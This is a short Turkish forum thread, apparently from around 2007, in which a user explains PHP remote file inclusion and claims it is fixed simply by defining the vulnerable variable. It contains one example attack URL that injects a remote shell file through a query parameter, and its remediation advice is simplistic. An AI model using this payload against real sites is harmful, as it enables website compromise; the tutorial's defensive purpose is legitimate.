folder Tahribat.com Forumları
linefolder Asp - Php - Cgi - Perl
linefolder PHP Remote File İnclusion[Döküman]



PHP Remote File İnclusion[Döküman]

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Realist
    Realist's avatar
    Kayıt Tarihi: 13/Nisan/2007
    Erkek
    Evet arkadaşlar bugün size rfi(remote file inclusion) yani uzakdan zararlı dosya çagırmayı ve bu açıkları nasıl kapatıcagımızı anlatıcam.

    Aşagıdaki kod da rfi (remote file inclusion) mevcutdur.

    http://img337.imageshack.us/img337/600/rfidi3.jpg
    Evet gördüğünüz gibi $k4ndemir değişken'i tanımlanmamış ve böyle bir açık çıkmış ortaya.

    siteadresi.com/index.php?k4ndemir=http://sh3ll.txt?

    ile uzakdaki zararlı dosyayı çagırıp siteye zarar verebilirler.

    Ancak bu açığı kolayca kapatabiliriz.

    $k4ndemir değişkenini tanımlamamız yeterli olucaktır.

    Aşagıdaki kod da görebilirsiniz;

    http://img123.imageshack.us/img123/6808/rfi2kd3.jpg

    evet bu kadar arkadaşlar insallah yardımcı olmuşumdur.
    bunu bir hacking dokumanı olarak algılamayın , isteyen algılasın :D

    ..
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Emrow
    Emrow's avatar
    Banlanmış Üye
    Kayıt Tarihi: 17/Mart/2007
    Erkek
    aynı dökümanın gelişmişini 3 sene önce hazırlamıştım.açıkları daha mantıklıydı.
Toplam Hit: 915 Toplam Mesaj: 2